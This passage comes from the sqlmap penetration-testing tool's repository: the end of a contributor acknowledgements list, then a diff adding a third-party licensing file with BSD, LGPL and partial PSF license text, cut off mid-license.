 Ulises U. Cune, <ulises2k(at)gmail.com>
 * for reporting a bug
 Alessandro Curio, <alessandro.curio(at)gmail.com>
 * for reporting a minor bug
 Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
 * for reporting a couple of bugs
 Sherif El-Deeb, <archeldeeb(at)gmail.com>
 * for reporting a minor bug
 Stefano Di Paola, <stefano.dipaola(at)wisec.it>
 * for suggesting good features
 Mosk Dmitri, <ya(at)darkbyte.ru>
 * for reporting a minor bug
 Meng Dong, <whenov(at)gmail.com>
 * for contributing a code for Waffit integration
 Carey Evans, <careye(at)spamcop.net>
 * for his fcrypt module that allows crypt(3) support
    on Windows platforms
 Shawn Evans, <shawndevans(at)gmail.com>
 * for suggesting an idea for one tamper script, greatest.py
 Adam Faheem, <faheem.adam(at)is.co.za>
 * for reporting a few bugs
 James Fisher, <www(at)sittinglittleduck.com>
 * for contributing two very good feature requests
 * for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
 Jim Forster, <jimforster(at)goldenwest.com>
 * for reporting a bug
 Rong-En Fan, <rafan(at)freebsd.org>
 * for commiting the sqlmap 0.5 port to the official FreeBSD project repository
 Giorgio Fedon, <giorgio.fedon(at)gmail.com>
 * for suggesting a speed improvement for bisection algorithm
 * for reporting a bug when running against Microsoft SQL Server 2005
 Kasper Fons, <thefeds(at)mail.dk>
 * for reporting several bugs
 Jose Fonseca, <jose.r.fonseca(at)gmail.com>
 * for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
    http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
    http://code.google.com/p/jrfonseca/wiki/XDot
 Alan Franzoni, <alan.franzoni(at)gmail.com>
 * for helping out with Python subprocess library
 Harold Fry, <harold(at)violaceo.us>
 * for suggesting a minor enhancement
 Daniel G. Gamonal, <lgrecol(at)gmail.com>
 * for reporting a minor bug
 Marcos Mateos Garcia, <mmateos(at)germinus.com>
 * for reporting a minor bug
 Andrew Gecse, <andrew.gecse(at)upcmail.hu>
 * for reporting a minor issue
 Ivan Giacomelli, <truemilk(at)insiberia.net>
 * for reporting a bug
 * for suggesting a minor enhancement
 * for reviewing the documentation
 Dimitris Giannitsaros, <daremon(at)gmail.com>
 * for contributing a REST-JSON API client
 Nico Golde, <nico(at)ngolde.de>
 * for reporting a couple of bugs
 Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
 * for reporting a bug
 * for contributing a minor patch
 Davide Guerri, <d.guerri(at)caspur.it>
 * for suggesting an enhancement
 Dan Guido, <dguido(at)gmail.com>
 * for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
 David Guimaraes, <skysbsb(at)gmail.com>
 * for reporting considerable amount of bugs
 * for suggesting several features
 Chris Hall, <chris.hall(at)mod10.net>
 * for coding the prettyprint.py library
 Tate Hansen, <tate(at)clearnetsec.com>
 * for donating to sqlmap development
 Mario Heiderich, <mario.heiderich(at)gmail.com>
 Christian Matthies, <ch0012(at)gmail.com>
 Lars H. Strojny, <lars(at)strojny.net>
 * for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
 Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
 * for reporting a bug
 * for donating to sqlmap development
 Alexander Hagenah, <ah(at)primepage.de>
 * for reporting a minor bug
 Dennis Hecken, <mail(at)8dh.de>
 * for reporting a minor bug
 Choi Ho, <counterhacker815(at)gmail.com>
 * for reporting a minor bug
 Jorge Hoya, <aquinadie(at)gmail.com>
 * for suggesting a minor enhancement
 Will Holcomb, <wholcomb(at)gmail.com>
 * for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
 Daniel Huckmann, <sanitybit(at)gmail.com>
 * for reporting a couple of bugs
 Daliev Ilya, <daliser(at)yandex.ru>
 * for reporting a bug
 Mehmet İnce, <mehmet(at)mehmetince.net>
 * for contributing a tamper script xforwardedfor.py
 Jovon Itwaru, <jovon.itwaru(at)gmail.com>
 * for reporting a minor bug
 Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
 * for reporting a bug
 Dirk Jagdmann, <doj(at)cubic.org>
 * for reporting a typo in the documentation
 Luke Jahnke, <luke.jahnke(at)gmail.com>
 * for reporting a bug when running against MySQL < 5.0
 Andrew Kitis <andrew.kitis(at)gmail.com>
 * for contributing a tamper script lowercase.py
 David Klein, <david.klein(at)ipfocus.com.au>
 * for reporting a minor code improvement
 Sven Klemm, <sven(at)c3d2.de>
 * for reporting two minor bugs with PostgreSQL
 Anant Kochhar, <anant.kochhar(at)secureyes.net>
 * for providing with feedback on the user's manual
 Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
 * for reporting a minor bug
 Alexander Kornbrust, <ak(at)red-database-security.com>
 * for reporting a couple of bugs
 Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
 * for reporting a minor bug
 Nicolas Krassas, <krasn(at)deventum.com>
 * for reporting a couple of bugs
 Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
 * for contributing a minor patch
 Alex Landa, <landa.alex86(at)gmail.com>
 * for contributing a patch adding beta support for XML output
 Guido Landi, <lists(at)keamera.org>
 * for reporting a couple of bugs
 * for the great technical discussions
 * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
 * for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
 Lee Lawson, <Lee.Lawson(at)dns.co.uk>
 * for reporting a minor bug
 John J. Lee, <jjl(at)pobox.com> and others
 * for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
 Nico Leidecker, <nico(at)leidecker.info>
 * for providing with feedback on a few features
 * for reporting a couple of bugs
 * for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
 Gabriel Lima, <pato(at)bugnet.com.br>
 * for reporting a couple of bugs
 Svyatoslav Lisin, <sel(at)3d-tech.ru>
 * for suggesting a minor feature
 Miguel Lopes, <theoverblue(at)gmail.com>
 * for reporting a minor bug
 Truong Duc Luong, <luongductruong(at)gmail.com>
 * for reporting a minor bug
 Pavol Luptak, <pavol.luptak(at)nethemba.com>
 * for reporting a bug when injecting on a POST data parameter
 Till Maas, <opensource(at)till.name>
 * for suggesting a minor feature
 Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
 * for extensively beta-testing sqlmap on various MySQL DBMS
 * for providing really appreciated feedback
 * for suggesting a lot of ideas and features
 Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
 * for contributing a Portuguese translation of README.md
 Ahmad Maulana, <matdhule(at)gmail.com>
 * for contributing a tamper script halfversionedmorekeywords.py
 Ferruh Mavituna, <ferruh(at)mavituna.com>
 * for exchanging ideas on the implementation of a couple of features
 David McNab, <david(at)conscious.co.nz>
 * for his XMLObject module that allows XML files to be operated on  like Python objects
 Spencer J. McIntyre, <smcintyre(at)securestate.com>
 * for reporting a minor bug
 * for contributing a patch for OS fingerprinting on DB2
 Brad Merrell, <bradmer12(at)gmail.com>
 * for reporting a minor bug
 Michael Meyer, <m.meyer2k(at)gmail.com>
 * for suggesting a minor feature
 Enrico Milanese, <enricomilanese(at)gmail.com>
 * for reporting a minor bug
 * for sharing some ideas for the PHP backdoor
 Liran Mimoni, <reactor.leet(at)gmail.com>
 * for reporting a minor bug
 Marco Mirandola, <mmmccc0(at)gmail.com>
 * for reporting a minor bug
 Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
 * for reporting a minor bug
 Anton Mogilin, <azarmaster81(at)yahoo.com>
 * for reporting a few bugs
 Sergio Molina, <smolina(at)wpr.es>
 * for reporting a minor bug
 Anastasios Monachos, <anastasiosm(at)gmail.com>
 * for providing some useful data
 * for suggesting a feature
 * for reporting a couple of bugs
 Kirill Morozov, <l0rda(at)l0rda.biz>
 * for reporting a bug
 * for suggesting a feature
 Alejo Murillo Moya, <alex(at)65535.com>
 * for reporting a minor bug
 * for suggesting a few features
 Yonny Mutai, <yonnym(at)googlemail.com>
 * for reporting a minor bug
 Roberto Nemirovsky, <roberto.paes(at)gmail.com>
 * for pointing out some enhancements
 Sebastian Nerz, <sebastian.nerz(at)syss.de>
 * for reporting a (potential) vulnerability in --eval
 Simone Onofri, <simone.onofri(at)gmail.com>
 * for patching the PHP web backdoor to make it work properly also on Windows
 Michele Orru, <michele.orru(at)antisnatchor.com>
 * for reporting a couple of bug
 * for suggesting ideas on how to implement the RESTful API
 Shaohua Pan, <pan(at)knownsec.com>
 * for reporting several bugs
 * for suggesting a few features
 Antonio Parata, <s4tan(at)ictsc.it>
 * for sharing some ideas for the PHP backdoor
 Adrian Pastor, <ap(at)gnucitizen.org>
 * for donating to sqlmap development
 Christopher Patten, <cpatten(at)sunera.com>
 * for reporting a bug in the blind SQL injection bisection algorithm
 Zack Payton, <zack.payton(at)executiveinstruments.com>
 * for reporting a minor bug
 Jaime Penalba, <nighterman(at)painsec.com>
 * for contributing a patch for INSERT/UPDATE generic boundaries
 Pedrito Perez, <0ark1ang3l(at)gmail.com>
 * for reporting a couple of bugs
 Brandon Perry, <bperry.volatile(at)gmail.com>
 * for reporting a couple of bugs
 Travis Phillips, <perfect_insanity2004(at)yahoo.com>
 * for suggesting a minor enhancement
 Mark Pilgrim, <mark(at)diveintomark.org>
 * for porting chardet package (Universal Encoding Detector) to Python
 Steve Pinkham, <steve.pinkham(at)gmail.com>
 * for suggesting a feature
 * for contributing a new SQL injection vector (MSSQL time-based blind)
 * for donating to sqlmap development
 Adam Pridgen, <adam.pridgen(at)gmail.com>
 * for suggesting some features
 Luka Pusic, <luka(at)pusic.si>
 * for reporting a couple of bugs
 Ole Rasmussen, <olerass(at)gmail.com>
 * for reporting a bug
 * for suggesting a feature
 Alberto Revelli, <r00t(at)northernfortress.net>
 * for inspiring to write sqlmap user's manual in SGML
 * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
 David Rhoades, <david.rhoades(at)mavensecurity.com>
 * for reporting a bug
 Andres Riancho, <andres.riancho(at)gmail.com>
 * for beta-testing sqlmap
 * for reporting a bug and suggesting some features
 * for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
 * for suggesting a way for handling DNS caching
 Jamie Riden, <jamie.riden(at)ngssecure.com>
 * for reporting a minor bug
 Alexander Rigbo, <alex(at)rigbo.se>
 * for contributing a minor patch
 Antonio Riva, <antonio.riva(at)gmail.com>
 * for reporting a bug when running with python 2.5
 Ethan Robish, <ethan.robish(at)gmail.com>
 * for reporting a bug
 Levente Rog, <levidos(at)gmail.com>
 * for reporting a minor bug
 Andrea Rossi, <andyroyalbattle(at)yahoo.it>
 * for reporting a minor bug
 * for suggesting a feature
 Frederic Roy, <frederic.roy(at)telindus.fr>
 * for reporting a couple of bugs
 Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
 * for suggesting a couple of minor enhancements
 Richard Safran, <allapplyhere(at)yahoo.com>
 * for donating the sqlmap.org domain
 Tomoyuki Sakurai, <cherry(at)trombik.org>
 * for submitting to the FreeBSD project the sqlmap 0.5 port
 Roberto Salgado, <lightos(at)gmail.com>
 * for contributing considerable amount of tamper scripts
 Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
 * for reporting considerable amount of bugs
 Marek Sarvas, <marek.sarvas(at)gmail.com>
 * for reporting several bugs
 Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
 * for reporting a minor bug
 Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
 * for reporting a minor bug
 Jorge Santos, <jorge_a_santos(at)hotmail.com>
 * for reporting a minor bug
 Sven Schluter, <sschlueter(at)netzwerk.cc>
 * for contributing a patch
 * for waiting a number of seconds between each HTTP request
 Ryan Sears, <rdsears(at)mtu.edu>
 * for suggesting a couple of enhancements
 * for donating to sqlmap development
 Uemit Seren, <uemit.seren(at)gmail.com>
 * for reporting a minor adjustment when running with python 2.6
 Shane Sewell, <ssewell(at)gmail.com>
 * for suggesting a feature
 Ahmed Shawky, <ahmed(at)isecur1ty.org>
 * for reporting a major bug with improper handling of parameter values
 * for reporting a bug
 Brian Shura, <bshura(at)appsecconsulting.com>
 * for reporting a bug
 Sumit Siddharth, <sid(at)notsosecure.com>
 * for sharing ideas on the implementation of a couple of features
 Andre Silva, <andreoaz(at)gmail.com>
 * for reporting a bug
 Benjamin Silva H. <silva96(at)gmail.com>
 * for reporting a bug
 Duarte Silva <duarte.silva(at)serializing.me>
 * for reporting a couple of bugs
 M Simkin, <mlsimkin(at)cox.net>
 * for suggesting a feature
 Konrads Smelkovs, <konrads(at)smelkovs.com>
 * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
 Chris Spencer, <chris.spencer(at)ngssecure.com>
 * for reviewing the user's manual grammar
 Michael D. Stenner, <mstenner(at)linux.duke.edu>
 * for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
 Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
 * for reporting a few bugs
 Jason Swan, <jasoneswan(at)gmail.com>
 * for reporting a bug when enumerating columns on Microsoft SQL Server
 * for suggesting a couple of improvements
 Chilik Tamir, <phenoman(at)gmail.com>
 * for contributing a patch for initial support SOAP requests
 Alessandro Tanasi, <alessandro(at)tanasi.it>
 * for extensively beta-testing sqlmap
 * for suggesting many features and reporting some bugs
 * for reviewing the documentation
 Andres Tarasco, <atarasco(at)gmail.com>
 * for contributing good feedback
 Tom Thumb, <k1971(at)live.co.uk>
 * for reporting a major bug
 Kazim Bugra Tombul, <mhackmail(at)gmail.com>
 * for reporting a minor bug
 Efrain Torres, <et(at)metasploit.com>
 * for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
 * for his great Metasploit WMAP Framework
 Sandro Tosi, <matrixhasu(at)gmail.com>
 * for helping to create sqlmap Debian package correctly
 Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
 * for reporting several bugs
 Vitaly Turenko, <dsu(at)dsu.com.ua>
 * for reporting a bug
 Augusto Urbieta, <x2xpy50(at)gmail.com>
 * for reporting a minor bug
 Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
 * for reporting a few bugs
 * for suggesting some features and improvements
 * for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
 * for reporting a couple of minor bugs
 Vlado Velichkovski, <ketejadam(at)hotmail.com>
 * for reporting considerable amount of bugs
 * for suggesting an enhancement
 Johnny Venter, <johnny.venter(at)zoho.com>
 * for reporting a couple of bugs
 Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
 * for suggesting couple of good features
 Patrick Webster, <patrick(at)aushack.com>
 * for suggesting an enhancement
 Ed Williams, <ed.williams(at)ngssecure.com>
 * for suggesting a minor enhancement
 Anthony Zboralski, <anthony.zboralski(at)bellua.com>
 * for providing with detailed feedback
 * for reporting a few minor bugs
 * for donating to sqlmap development
 Thierry Zoller, <thierry(at)zoller.lu>
 * for reporting a couple of major bugs
 Zhen Zhou, <zhouzhenster(at)gmail.com>
 * for suggesting a feature
 -insane-, <insane_(at)gmx.de>
 * for reporting a minor bug
 1ndr4 joe, <c0d3w4st3r(at)gmail.com>
 * for reporting a couple of bugs
 abc abc, <biedimc(at)gmx.net>
 * for reporting a minor bug
 Abuse 007, <abuse007(at)gmail.com>
 * for reporting a bug
 agix, <florian.gaultier@gmail.com>
 * for contributing the file upload via certutil.exe functionality
 Alex, <m3zero(at)gmail.com>
 * for reporting a minor bug
 anonymous anonymous, <tmp(at)2ch.so>
 * for reporting a couple of bugs
 bamboo, <roberthacksley(at)gmail.com>
 * for reporting a couple of bugs
 Brandon E., <brandonpoc(at)gmail.com>
 * for reporting a bug
 black zero, <timeisflowing(at)gmail.com>
 * for reporting a minor bug
 blueBoy, <blueboy4444(at)gmail.com>
 * for reporting a bug
 buawig, <buawig(at)gmail.com>
 * for reporting considerable amount of bugs
 Bugtrace, <bugtrace(at)gmail.com>
 * for reporting several bugs
 cats, <dump(at)alcor.se>
 * for reporting a couple of bugs
 Christian S, <christian_s(at)linuxmail.org>
 * for reporting a minor bug
 clav, <elclav(at)gmail.com>
 * for reporting a minor bug
 dragoun dash, <dragoun.dash(at)gmail.com>
 * for reporting a minor bug
 flsf, <jianmaflsf@gmail.com>
 * for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
 * for contributing a minor patch
 fufuh, <fufuh(at)users.sourceforge.net>
 * for reporting a bug when running on Windows
 Hans Wurst, <wurstwass0r(at)googlemail.com>
 * for reporting a couple of bugs
 Hysia, <hysia(at)huorui.net>
 * for contributing a Chinese translation of README.md
 james, <james(at)ev6.net>
 * for reporting a bug
 Joe "Pragmatk", <pragmatk(at)gmail.com>
 * for reporting a few bugs
 John Smith, <tixos(at)live.com>
 * for reporting several bugs
 * for suggesting some features
 m4l1c3, <malice.anon(at)gmail.com>
 * for reporting considerable amount of bugs
 mariano, <marianoso(at)gmail.com>
 * for reporting a bug
 mitchell, <mitchell(at)tufala.net>
 * for reporting a few bugs
 Nadzree, <nadzree(at)bake180.com>
 * for reporting a minor bug
 nightman, <nightman(at)email.de>
 * for reporting considerable amount of bugs
 Oso Dog osodog123(at)yahoo.com
 * for reporting a minor bug
 pacman730, <pacman730(at)users.sourceforge.net>
 * for reporting a bug
 pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
 * for reporting several bugs
 * for suggesting a few minor enhancements
 Phat R., <phatthanaphol(at)gmail.com>
 * for reporting a few bugs
 Phil P, <(at)superevr>
 * for suggesting a minor enhancement
 ragos, <ragos(at)joker.ms>
 * for reporting a minor bug
 rmillet, <rmillet42(at)gmail.com>
 * for reporting a bug
 Rub3nCT, <rub3nct(at)gmail.com>
 * for reporting a minor bug
 shiftzwei, <shiftzwei(at)gmail.com>
 * for reporting a couple of bugs
 smith, <esmyl911(at)gmail.com>
 * for reporting a minor bug
 Soma Cruz, <oleg.kupreev(at)gmail.com>
 * for reporting a minor bug
 Spiros94, <cont(at)eyrhka.gr>
 * for contributing a Greek translation of README.md
 Stuffe, <stuffe.dk(at)gmail.com>
 * for reporting a minor bug and a feature request
 Sylphid, <sylphid.su(at)sti.com.tw>
 * for suggesting some features
 syssecurity.info, <syssecurity7(at)googlemail.com>
 * for reporting a minor bug
 This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
 * for reporting a minor bug
 ToR, <sstidus(at)email.it>
 * for reporting considerable amount of bugs
 * for suggesting a feature
 ultramegaman, <seclists(at)ultramegaman.com>
 * for reporting a minor bug
 Vinicius, <viniciusmaxdaloop(at)gmail.com>
 * for reporting a minor bug
 wanglei, <wanglei(at)17uxi.cn>
 * for reporting a minor bug
 warninggp, <warninggp(at)gmail.com>
 * for reporting a few minor bugs
 x, <deep_freeze(at)mail.ru>
 * for reporting a bug
 zhouhx, <zhouhx(at)knownsec.com>
 * for contributing a minor patch
 # Organizations
 Black Hat team, <info(at)blackhat.com>
 * for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
 * Homepage: http://goo.gl/BKfs7
 * Slides: http://goo.gl/Dh65t
 * White paper: http://goo.gl/spX3N
 SOURCE Conference team, <press(at)sourceconference.com>
 * for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
 * Homepage: http://goo.gl/IeXV4
 * Slides: http://goo.gl/OKnfj
 AthCon Conference team, <cfp(at)athcon.org>
 * for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
 * Homepage: http://goo.gl/Fs71I
 * Slides: http://goo.gl/QMfjO
 Metasploit Framework development team, <msfdev(at)metasploit.com>
 * for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
 * Homepage: http://www.metasploit.com
 OWASP Board, <info(at)owasp.org>
 * for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
 * Homepage: http://www.owasp.org
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -0,0 +1,314 @@
 This file lists bundled packages and their associated licensing terms.
 # BSD
 * The Ansistrm library located under thirdparty/ansistrm/.
  Copyright (C) 2010-2012, Vinay Sajip.
 * The Beautiful Soup library located under thirdparty/beautifulsoup/.
  Copyright (C) 2004-2010, Leonard Richardson.
 * The ClientForm library located under thirdparty/clientform/.
  Copyright (C) 2002-2007, John J. Lee.
  Copyright (C) 2005, Gary Poster.
  Copyright (C) 2005, Zope Corporation.
  Copyright (C) 1998-2000, Gisle Aas.
 * The Colorama library located under thirdparty/colorama/.
  Copyright (C) 2013, Jonathan Hartley.
 * The Fcrypt library located under thirdparty/fcrypt/.
  Copyright (C) 2000, 2001, 2004 Carey Evans.
 * The Odict library located under thirdparty/odict/.
  Copyright (C) 2005, Nicola Larosa, Michael Foord.
 * The Oset library located under thirdparty/oset/.
  Copyright (C) 2010, BlueDynamics Alliance, Austria.
  Copyright (C) 2009, Raymond Hettinger, and others.
 * The PrettyPrint library located under thirdparty/prettyprint/.
  Copyright (C) 2010, Chris Hall.
 * The SocksiPy library located under thirdparty/socks/.
  Copyright (C) 2006, Dan-Haim.
 ````
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:
     - Redistributions of source code must retain the above copyright
      notice, this list of conditions and the following disclaimer.
     - Redistributions in binary form must reproduce the above copyright
      notice, this list of conditions and the following disclaimer in the
      documentation and/or other materials provided with the distribution.
     - Neither the name of the <organization> nor the
      names of its contributors may be used to endorse or promote products
      derived from this software without specific prior written permission.
 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
 DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 ````
 # LGPL
 * The Chardet library located under thirdparty/chardet/.
  Copyright (C) 2008, Mark Pilgrim.
 * The Gprof2dot library located under thirdparty/gprof2dot/.
  Copyright (C) 2008-2009, Jose Fonseca.
 * The KeepAlive library located under thirdparty/keepalive/.
  Copyright (C) 2002-2003, Michael D. Stenner.
 * The MultipartPost library located under thirdparty/multipart/.
  Copyright (C) 2006, Will Holcomb.
 * The XDot library located under thirdparty/xdot/.
  Copyright (C) 2008, Jose Fonseca.
 * The icmpsh tool located under extra/icmpsh/.
  Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
 ````
                   GNU LESSER GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007
 Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.
  This version of the GNU Lesser General Public License incorporates
 the terms and conditions of version 3 of the GNU General Public
 License, supplemented by the additional permissions listed below.
  0. Additional Definitions.
  As used herein, "this License" refers to version 3 of the GNU Lesser
 General Public License, and the "GNU GPL" refers to version 3 of the GNU
 General Public License.
  "The Library" refers to a covered work governed by this License,
 other than an Application or a Combined Work as defined below.
  An "Application" is any work that makes use of an interface provided
 by the Library, but which is not otherwise based on the Library.
 Defining a subclass of a class defined by the Library is deemed a mode
 of using an interface provided by the Library.
  A "Combined Work" is a work produced by combining or linking an
 Application with the Library.  The particular version of the Library
 with which the Combined Work was made is also called the "Linked
 Version".
  The "Minimal Corresponding Source" for a Combined Work means the
 Corresponding Source for the Combined Work, excluding any source code
 for portions of the Combined Work that, considered in isolation, are
 based on the Application, and not on the Linked Version.
  The "Corresponding Application Code" for a Combined Work means the
 object code and/or source code for the Application, including any data
 and utility programs needed for reproducing the Combined Work from the
 Application, but excluding the System Libraries of the Combined Work.
  1. Exception to Section 3 of the GNU GPL.
  You may convey a covered work under sections 3 and 4 of this License
 without being bound by section 3 of the GNU GPL.
  2. Conveying Modified Versions.
  If you modify a copy of the Library, and, in your modifications, a
 facility refers to a function or data to be supplied by an Application
 that uses the facility (other than as an argument passed when the
 facility is invoked), then you may convey a copy of the modified
 version:
   a) under this License, provided that you make a good faith effort to
   ensure that, in the event an Application does not supply the
   function or data, the facility still operates, and performs
   whatever part of its purpose remains meaningful, or
   b) under the GNU GPL, with none of the additional permissions of
   this License applicable to that copy.
  3. Object Code Incorporating Material from Library Header Files.
  The object code form of an Application may incorporate material from
 a header file that is part of the Library.  You may convey such object
 code under terms of your choice, provided that, if the incorporated
 material is not limited to numerical parameters, data structure
 layouts and accessors, or small macros, inline functions and templates
 (ten or fewer lines in length), you do both of the following:
   a) Give prominent notice with each copy of the object code that the
   Library is used in it and that the Library and its use are
   covered by this License.
   b) Accompany the object code with a copy of the GNU GPL and this license
   document.
  4. Combined Works.
  You may convey a Combined Work under terms of your choice that,
 taken together, effectively do not restrict modification of the
 portions of the Library contained in the Combined Work and reverse
 engineering for debugging such modifications, if you also do each of
 the following:
   a) Give prominent notice with each copy of the Combined Work that
   the Library is used in it and that the Library and its use are
   covered by this License.
   b) Accompany the Combined Work with a copy of the GNU GPL and this license
   document.
   c) For a Combined Work that displays copyright notices during
   execution, include the copyright notice for the Library among
   these notices, as well as a reference directing the user to the
   copies of the GNU GPL and this license document.
   d) Do one of the following:
       0) Convey the Minimal Corresponding Source under the terms of this
       License, and the Corresponding Application Code in a form
       suitable for, and under terms that permit, the user to
       recombine or relink the Application with a modified version of
       the Linked Version to produce a modified Combined Work, in the
       manner specified by section 6 of the GNU GPL for conveying
       Corresponding Source.
       1) Use a suitable shared library mechanism for linking with the
       Library.  A suitable mechanism is one that (a) uses at run time
       a copy of the Library already present on the user's computer
       system, and (b) will operate properly with a modified version
       of the Library that is interface-compatible with the Linked
       Version.
   e) Provide Installation Information, but only if you would otherwise
   be required to provide such information under section 6 of the
   GNU GPL, and only to the extent that such information is
   necessary to install and execute a modified version of the
   Combined Work produced by recombining or relinking the
   Application with a modified version of the Linked Version. (If
   you use option 4d0, the Installation Information must accompany
   the Minimal Corresponding Source and Corresponding Application
   Code. If you use option 4d1, you must provide the Installation
   Information in the manner specified by section 6 of the GNU GPL
   for conveying Corresponding Source.)
  5. Combined Libraries.
  You may place library facilities that are a work based on the
 Library side by side in a single library together with other library
 facilities that are not Applications and are not covered by this
 License, and convey such a combined library under terms of your
 choice, if you do both of the following:
   a) Accompany the combined library with a copy of the same work based
   on the Library, uncombined with any other library facilities,
   conveyed under the terms of this License.
   b) Give prominent notice with the combined library that part of it
   is a work based on the Library, and explaining where to find the
   accompanying uncombined form of the same work.
  6. Revised Versions of the GNU Lesser General Public License.
  The Free Software Foundation may publish revised and/or new versions
 of the GNU Lesser General Public License from time to time. Such new
 versions will be similar in spirit to the present version, but may
 differ in detail to address new problems or concerns.
  Each version is given a distinguishing version number. If the
 Library as you received it specifies that a certain numbered version
 of the GNU Lesser General Public License "or any later version"
 applies to it, you have the option of following the terms and
 conditions either of that published version or of any later version
 published by the Free Software Foundation. If the Library as you
 received it does not specify a version number of the GNU Lesser
 General Public License, you may choose any version of the GNU Lesser
 General Public License ever published by the Free Software Foundation.
  If the Library as you received it specifies that a proxy can decide
 whether future versions of the GNU Lesser General Public License shall
 apply, that proxy's public statement of acceptance of any version is
 permanent authorization for you to choose that version for the
 Library.
 ````
 # PSF
 * The Magic library located under thirdparty/magic/.
  Copyright (C) 2011, Adam Hupp.
 ````
 PSF LICENSE AGREEMENT FOR PYTHON 2.7.3
 This LICENSE AGREEMENT is between the Python Software Foundation (“PSF”),
 and the Individual or Organization (“Licensee”) accessing and otherwise
 using Python 2.7.3 software in source or binary form and its associated
 documentation.
 Subject to the terms and conditions of this License Agreement, PSF hereby
 grants Licensee a nonexclusive, royalty-free, world-wide license to
 reproduce, analyze, test, perform and/or display publicly, prepare
 derivative works, distribute, and otherwise use Python 2.7.3 alone or in any
 derivative version, provided, however, that PSF’s License Agreement and
 PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software
 Foundation; All Rights Reserved” are retained in Python 2.7.3 alone or in
 any derivative version prepared by Licensee.
 In the event Licensee prepares a derivative work that is based on or
 incorporates Python 2.7.3 or any part thereof, and wants to make the
 derivative work available to others as provided herein, then Licensee hereby
 agrees to include in any such work a brief summary of the changes made to
 Python 2.7.3.
 PSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF
